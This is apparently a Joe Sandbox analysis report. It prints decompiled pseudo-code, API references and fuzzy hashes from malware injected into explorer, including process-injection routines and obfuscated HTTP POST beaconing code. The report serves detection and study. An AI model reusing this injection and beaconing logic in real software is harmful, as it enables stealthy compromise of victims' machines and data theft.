                    • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                  • SysFreeString.OLEAUT32(?), ref: 0008DF82
                  • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                  • String ID: FALSE$TRUE
                  • API String ID: 1290676130-1412513891
                  • Opcode ID: 2e605f16a7bee3e13d6a0837757ba05e1d766071a1216dbb015d656176137527
                  • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                  • Opcode Fuzzy Hash: 2e605f16a7bee3e13d6a0837757ba05e1d766071a1216dbb015d656176137527
                  • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 59%
                  			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
                  				signed int _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				struct HINSTANCE__* _v40;
                  				char _v44;
                  				char _v56;
                  				char _v72;
                  				struct _WNDCLASSEXA _v120;
                  				intOrPtr _t69;
                  				intOrPtr _t71;
                  				intOrPtr _t75;
                  				intOrPtr _t80;
                  				intOrPtr _t92;
                  				intOrPtr _t95;
                  				intOrPtr _t96;
                  				struct HWND__* _t106;
                  				intOrPtr* _t113;
                  				struct HINSTANCE__* _t116;
                  				intOrPtr _t120;
                  				intOrPtr _t126;
                  				intOrPtr _t131;
                  				intOrPtr _t134;
                  				intOrPtr _t136;
                  				intOrPtr _t139;
                  				char _t140;
                  				intOrPtr _t141;
                  
                  				_t69 =  *0x9e688; // 0xb0000
                  				_t126 = __ecx;
                  				_t134 = __edx;
                  				_t116 = 0;
                  				_v36 = __edx;
                  				_v16 = 0;
                  				_v44 = 0;
                  				_v40 = 0;
                  				_v12 = 0;
                  				_v8 = 0;
                  				_v24 = 0;
                  				_v20 = __ecx;
                  				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                  					E0008E23E(0x1f4);
                  					_t116 = 0;
                  				}
                  				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                  				_v28 = _t116;
                  				if( *_t113 != 0x4550) {
                  					L12:
                  					if(_v8 != 0) {
                  						_t75 =  *0x9e780; // 0x0
                  						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                  						_v8 = _v8 & 0x00000000;
                  					}
                  					L14:
                  					if(_v12 != 0) {
                  						_t136 =  *0x9e780; // 0x0
                  						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                  					}
                  					if(_v16 != 0) {
                  						_t71 =  *0x9e780; // 0x0
                  						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                  					}
                  					return _v8;
                  				}
                  				_push(_t116);
                  				_push(0x8000000);
                  				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                  				_push(0x40);
                  				_push( &_v44);
                  				_push(_t116);
                  				_push(0xe);
                  				_push( &_v16);
                  				_t80 =  *0x9e780; // 0x0
                  				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                  					goto L12;
                  				}
                  				_v120.style = 0xb;
                  				_v120.cbSize = 0x30;
                  				_v120.lpszClassName =  &_v56;
                  				asm("movsd");
                  				_v120.lpfnWndProc = DefWindowProcA;
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsb");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsw");
                  				asm("movsb");
                  				_v120.cbWndExtra = 0;
                  				_v120.lpszMenuName = 0;
                  				_v120.cbClsExtra = 0;
                  				_v120.hInstance = 0;
                  				if(RegisterClassExA( &_v120) != 0) {
                  					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                  					if(_t106 != 0) {
                  						DestroyWindow(_t106);
                  						UnregisterClassA( &_v56, 0);
                  					}
                  				}
                  				_t139 =  *0x9e780; // 0x0
                  				_push(0x40);
                  				_push(0);
                  				_push(2);
                  				_push( &_v24);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push( &_v12);
                  				_push(GetCurrentProcess());
                  				_push(_v16);
                  				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                  					_t126 = _v20;
                  					goto L12;
                  				} else {
                  					_push(0x40);
                  					_push(0);
                  					_push(2);
                  					_push( &_v24);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_t126 = _v20;
                  					_push( &_v8);
                  					_t92 =  *0x9e780; // 0x0
                  					_push(_t126);
                  					_push(_v16);
                  					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                  						goto L12;
                  					}
                  					_t140 = E00088669( *0x9e688, 0x1ac4);
                  					_v32 = _t140;
                  					if(_t140 == 0) {
                  						goto L12;
                  					}
                  					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                  					_t95 =  *0x9e684; // 0x40f8f0
                  					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                  					_t120 =  *0x9e684; // 0x40f8f0
                  					_t131 = _t96;
                  					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                  					E0008861A( &_v32, 0x1ac4);
                  					_t141 =  *0x9e688; // 0xb0000
                  					 *0x9e688 = _t131;
                  					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                  					E0008C63F(_v12, _v8, _v36);
                  					 *0x9e688 = _t141;
                  					goto L14;
                  				}
                  			}


                  APIs
                  • RegisterClassExA.USER32 ref: 0008C785
                  • CreateWindowExA.USER32 ref: 0008C7B0
                  • DestroyWindow.USER32 ref: 0008C7BB
                  • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                  • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                  • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                  • API String ID: 3082384575-2319545179
                  • Opcode ID: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
                  • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                  • Opcode Fuzzy Hash: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
                  • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                  				char _v8;
                  				char _v16;
                  				short _v144;
                  				short _v664;
                  				void* _t19;
                  				struct HINSTANCE__* _t22;
                  				long _t23;
                  				long _t24;
                  				char* _t27;
                  				WCHAR* _t32;
                  				long _t33;
                  				intOrPtr _t37;
                  				intOrPtr _t38;
                  				void* _t49;
                  				int _t53;
                  				void* _t54;
                  				intOrPtr* _t55;
                  				void* _t57;
                  
                  				_t49 = __edx;
                  				OutputDebugStringA("Hello qqq");
                  				if(_a8 != 1) {
                  					if(_a8 != 0) {
                  						L12:
                  						return 1;
                  					}
                  					SetLastError(0xaa);
                  					L10:
                  					return 0;
                  				}
                  				E000885EF();
                  				_t19 = E0008980C( &_v16);
                  				_t57 = _t49;
                  				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                  					goto L12;
                  				} else {
                  					E00088F78();
                  					GetModuleHandleA(0);
                  					_t22 = _a4;
                  					 *0x9e69c = _t22;
                  					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                  					_t24 = GetLastError();
                  					if(_t23 != 0 && _t24 != 0x7a) {
                  						memset( &_v144, 0, 0x80);
                  						_t55 = _t54 + 0xc;
                  						_t53 = 0;
                  						do {
                  							_t27 = E000895C7(_t53);
                  							_a8 = _t27;
                  							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                  							E000885C2( &_a8);
                  							_t53 = _t53 + 1;
                  						} while (_t53 < 0x2710);
                  						E00092A5B( *0x9e69c);
                  						 *_t55 = 0x7c3;
                  						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
                  						 *_t55 = 0xb4e;
                  						_t32 = E000895E1(0x9ba28);
                  						_a8 = _t32;
                  						_t33 = GetFileAttributesW(_t32);
                  						_push( &_a8);
                  						if(_t33 == 0xffffffff) {
                  							E000885D5();
                  							_v8 = 0;
                  							_t37 =  *0x9e684; // 0x40f8f0
                  							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
                  							 *0x9e6a8 = _t38;
                  							if(_t38 == 0) {
                  								goto L10;
                  							}
                  							goto L12;
                  						}
                  						E000885D5();
                  					}
                  					goto L10;
                  				}
                  			}

                  APIs
                  • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                  • SetLastError.KERNEL32(000000AA), ref: 000860D7
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                  • GetLastError.KERNEL32 ref: 00085FEF
                  • memset.MSVCRT ref: 00086013
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                  • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                  • String ID: Hello qqq
                  • API String ID: 1203100507-3610097158
                  • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                  • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                  • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                  • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                  				char _v8;
                  				char _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				char _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				char _v64;
                  				int _v76;
                  				void* _v80;
                  				intOrPtr _v100;
                  				int _v104;
                  				void* _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				char* _v120;
                  				void _v124;
                  				char _v140;
                  				void _v396;
                  				void _v652;
                  				intOrPtr _t105;
                  				intOrPtr _t113;
                  				intOrPtr* _t115;
                  				intOrPtr _t118;
                  				intOrPtr _t121;
                  				intOrPtr _t124;
                  				intOrPtr _t127;
                  				intOrPtr _t131;
                  				char _t133;
                  				intOrPtr _t136;
                  				char _t138;
                  				char _t139;
                  				intOrPtr _t141;
                  				intOrPtr _t147;
                  				intOrPtr _t154;
                  				intOrPtr _t158;
                  				intOrPtr _t162;
                  				intOrPtr _t164;
                  				intOrPtr _t166;
                  				intOrPtr _t172;
                  				intOrPtr _t176;
                  				void* _t183;
                  				void* _t185;
                  				intOrPtr _t186;
                  				char _t195;
                  				intOrPtr _t203;
                  				intOrPtr _t204;
                  				signed int _t209;
                  				void _t212;
                  				intOrPtr _t213;
                  				void* _t214;
                  				intOrPtr _t216;
                  				char _t217;
                  				intOrPtr _t218;
                  				signed int _t219;
                  				signed int _t220;
                  				void* _t221;
                  
                  				_v40 = _v40 & 0x00000000;
                  				_v24 = 4;
                  				_v36 = 1;
                  				_t214 = __edx;
                  				memset( &_v396, 0, 0x100);
                  				memset( &_v652, 0, 0x100);
                  				_v64 = E000895C7(0x85b);
                  				_v60 = E000895C7(0xdc9);
                  				_v56 = E000895C7(0x65d);
                  				_v52 = E000895C7(0xdd3);
                  				_t105 = E000895C7(0xb74);
                  				_v44 = _v44 & 0;
                  				_t212 = 0x3c;
                  				_v48 = _t105;
                  				memset( &_v124, 0, 0x100);
                  				_v116 = 0x10;
                  				_v120 =  &_v140;
                  				_v124 = _t212;
                  				_v108 =  &_v396;
                  				_v104 = 0x100;
                  				_v80 =  &_v652;
                  				_push( &_v124);
                  				_push(0);
                  				_v76 = 0x100;
                  				_push(E0008C379(_t214));
                  				_t113 =  *0x9e6a4; // 0x40fe60
                  				_push(_t214);
                  				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                  					_t209 = 0;
                  					_v20 = 0;
                  					do {
                  						_t115 =  *0x9e6a4; // 0x40fe60
                  						_v12 = 0x8404f700;
                  						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                  						if(_t213 != 0) {
                  							_t195 = 3;
                  							_t185 = 4;
                  							_v8 = _t195;
                  							_t118 =  *0x9e6a4; // 0x40fe60
                  							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                  							_v8 = 0x3a98;
                  							_t121 =  *0x9e6a4; // 0x40fe60
                  							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                  							_v8 = 0x493e0;
                  							_t124 =  *0x9e6a4; // 0x40fe60
                  							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                  							_v8 = 0x493e0;
                  							_t127 =  *0x9e6a4; // 0x40fe60
                  							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                  							_t131 =  *0x9e6a4; // 0x40fe60
                  							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                  							if(_a24 != 0) {
                  								E0008980C(_a24);
                  							}
                  							if(_t186 != 0) {
                  								_t133 = 0x8484f700;
                  								if(_v112 != 4) {
                  									_t133 = _v12;
                  								}
                  								_t136 =  *0x9e6a4; // 0x40fe60
                  								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                  								_v8 = _t216;
                  								if(_a24 != 0) {
                  									E0008980C(_a24);
                  								}
                  								if(_t216 != 0) {
                  									_t138 = 4;
                  									if(_v112 != _t138) {
                  										L19:
                  										_t139 = E000895C7(0x777);
                  										_t217 = _t139;
                  										_v12 = _t217;
                  										_t141 =  *0x9e6a4; // 0x40fe60
                  										_t218 = _v8;
                  										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
                  										E000885C2( &_v12);
                  										if(_a24 != 0) {
                  											E0008980C(_a24);
                  										}
                  										if(_v28 != 0) {
                  											L28:
                  											_v24 = 8;
                  											_push(0);
                  											_v32 = 0;
                  											_v28 = 0;
                  											_push( &_v24);
                  											_push( &_v32);
                  											_t147 =  *0x9e6a4; // 0x40fe60
                  											_push(0x13);
                  											_push(_t218);
                  											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                  												_t219 = E00089749( &_v32);
                  												if(_t219 == 0xc8) {
                  													 *_a20 = _v8;
                  													 *_a12 = _t213;
                  													 *_a16 = _t186;
                  													return 0;
                  												}
                  												_t220 =  ~_t219;
                  												L32:
                  												_t154 =  *0x9e6a4; // 0x40fe60
                  												 *((intOrPtr*)(_t154 + 8))(_v8);
                  												L33:
                  												if(_t186 != 0) {
                  													_t158 =  *0x9e6a4; // 0x40fe60
                  													 *((intOrPtr*)(_t158 + 8))(_t186);
                  												}
                  												if(_t213 != 0) {
                  													_t203 =  *0x9e6a4; // 0x40fe60
                  													 *((intOrPtr*)(_t203 + 8))(_t213);
                  												}
                  												return _t220;
                  											}
                  											GetLastError();
                  											_t220 = 0xfffffff8;
                  											goto L32;
                  										} else {
                  											GetLastError();
                  											_t162 =  *0x9e6a4; // 0x40fe60
                  											 *((intOrPtr*)(_t162 + 8))(_t218);
                  											_t218 = 0;
                  											goto L23;
                  										}
                  									}
                  									_v12 = _t138;
                  									_push( &_v12);
                  									_push( &_v16);
                  									_t172 =  *0x9e6a4; // 0x40fe60
                  									_push(0x1f);
                  									_push(_t216);
                  									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                  										L18:
                  										GetLastError();
                  										goto L19;
                  									}
                  									_v16 = _v16 | 0x00003380;
                  									_push(4);
                  									_push( &_v16);
                  									_t176 =  *0x9e6a4; // 0x40fe60
                  									_push(0x1f);
                  									_push(_t216);
                  									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                  										goto L19;
                  									}
                  									goto L18;
                  								} else {
                  									GetLastError();
                  									L23:
                  									_t164 =  *0x9e6a4; // 0x40fe60
                  									 *((intOrPtr*)(_t164 + 8))(_t186);
                  									_t186 = 0;
                  									goto L24;
                  								}
                  							} else {
                  								GetLastError();
                  								L24:
                  								_t166 =  *0x9e6a4; // 0x40fe60
                  								 *((intOrPtr*)(_t166 + 8))(_t213);
                  								_t213 = 0;
                  								goto L25;
                  							}
                  						}
                  						GetLastError();
                  						L25:
                  						_t204 = _t218;
                  						_t209 = _v20 + 1;
                  						_v20 = _t209;
                  					} while (_t209 < 2);
                  					_v8 = _t218;
                  					if(_t204 != 0) {
                  						goto L28;
                  					}
                  					_t220 = 0xfffffffe;
                  					goto L33;
                  				}
                  				_t183 = 0xfffffffc;
                  				return _t183;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$ErrorLast
                  • String ID: POST
                  • API String ID: 2570506013-1814004025
                  • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                  • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E000916B8(signed int* _a4) {
                  				char _v8;
                  				_Unknown_base(*)()* _v12;
                  				_Unknown_base(*)()* _v16;
                  				char _v20;
                  				_Unknown_base(*)()* _t16;
                  				_Unknown_base(*)()* _t17;
                  				void* _t22;
                  				intOrPtr* _t28;
                  				signed int _t29;
                  				signed int _t30;
                  				struct HINSTANCE__* _t32;
                  				void* _t34;
                  
                  				_t30 = 0;
                  				_v8 = 0;
                  				_t32 = GetModuleHandleA("advapi32.dll");
                  				if(_t32 == 0) {
                  					L9:
                  					return 1;
                  				}
                  				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                  				_v12 = _t16;
                  				if(_t16 == 0) {
                  					goto L9;
                  				}
                  				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                  				_v16 = _t17;
                  				if(_t17 == 0) {
                  					goto L9;
                  				}
                  				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                  				if(_t28 == 0) {
                  					goto L9;
                  				}
                  				_push(0xf0000000);
                  				_push(1);
                  				_push(0);
                  				_push(0);
                  				_push( &_v8);
                  				if(_v12() == 0) {
                  					goto L9;
                  				}
                  				_t22 = _v16(_v8, 4,  &_v20);
                  				 *_t28(_v8, 0);
                  				if(_t22 == 0) {
                  					goto L9;
                  				}
                  				_t29 = 0;
                  				do {
                  					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                  					_t29 = _t29 + 1;
                  				} while (_t29 < 4);
                  				 *_a4 = _t30;
                  				return 0;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                  • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                  • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                  • API String ID: 667068680-129414566
                  • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                  • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                  				signed int _t12;
                  				signed int _t13;
                  				int _t15;
                  				char* _t24;
                  				char* _t26;
                  				char* _t28;
                  				char* _t29;
                  				signed int _t40;
                  				char* _t43;
                  				char* _t45;
                  				long long* _t47;
                  
                  				_t12 = _a20;
                  				if(_t12 == 0) {
                  					_t12 = 0x11;
                  				}
                  				_t26 = _a4;
                  				_push(_t30);
                  				 *_t47 = _a12;
                  				_push(_t12);
                  				_push("%.*g");
                  				_push(_a8);
                  				_push(_t26);
                  				L00092285();
                  				_t40 = _t12;
                  				if(_t40 < 0 || _t40 >= _a8) {
                  					L19:
                  					_t13 = _t12 | 0xffffffff;
                  					goto L20;
                  				} else {
                  					L000922CD();
                  					_t15 =  *((intOrPtr*)( *_t12));
                  					if(_t15 != 0x2e) {
                  						_t24 = strchr(_t26, _t15);
                  						if(_t24 != 0) {
                  							 *_t24 = 0x2e;
                  						}
                  					}
                  					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                  						L11:
                  						_t43 = strchr(_t26, 0x65);
                  						_t28 = _t43;
                  						if(_t43 == 0) {
                  							L18:
                  							_t13 = _t40;
                  							L20:
                  							return _t13;
                  						}
                  						_t45 = _t43 + 1;
                  						_t29 = _t28 + 2;
                  						if( *_t45 == 0x2d) {
                  							_t45 = _t29;
                  						}
                  						while( *_t29 == 0x30) {
                  							_t29 = _t29 + 1;
                  						}
                  						if(_t29 != _t45) {
                  							E00088706(_t45, _t29, _t40 - _t29 + _a4);
                  							_t40 = _t40 + _t45 - _t29;
                  						}
                  						goto L18;
                  					} else {
                  						_t6 = _t40 + 3; // 0x909b2
                  						_t12 = _t6;
                  						if(_t12 >= _a8) {
                  							goto L19;
                  						}
                  						_t26[_t40] = 0x302e;
                  						( &(_t26[2]))[_t40] = 0;
                  						_t40 = _t40 + 2;
                  						goto L11;
                  					}
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: strchr$_snprintflocaleconv
                  • String ID: %.*g
                  • API String ID: 1910550357-952554281
                  • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                  • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _snprintfqsort
                  • String ID: %I64d$false$null$true
                  • API String ID: 756996078-4285102228
                  • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                  • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                  • SysAllocString.OLEAUT32(?), ref: 0008D764
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                  • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                  • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$\u%04X$\u%04X\u%04X
                  • API String ID: 0-2132903582
                  • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                  • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E0008D523(void* __ecx) {
                  				char _v8;
                  				void* _v12;
                  				char* _t15;
                  				intOrPtr* _t16;
                  				void* _t21;
                  				intOrPtr* _t23;
                  				intOrPtr* _t24;
                  				intOrPtr* _t25;
                  				void* _t30;
                  				void* _t33;
                  
                  				_v12 = 0;
                  				_v8 = 0;
                  				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                  				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
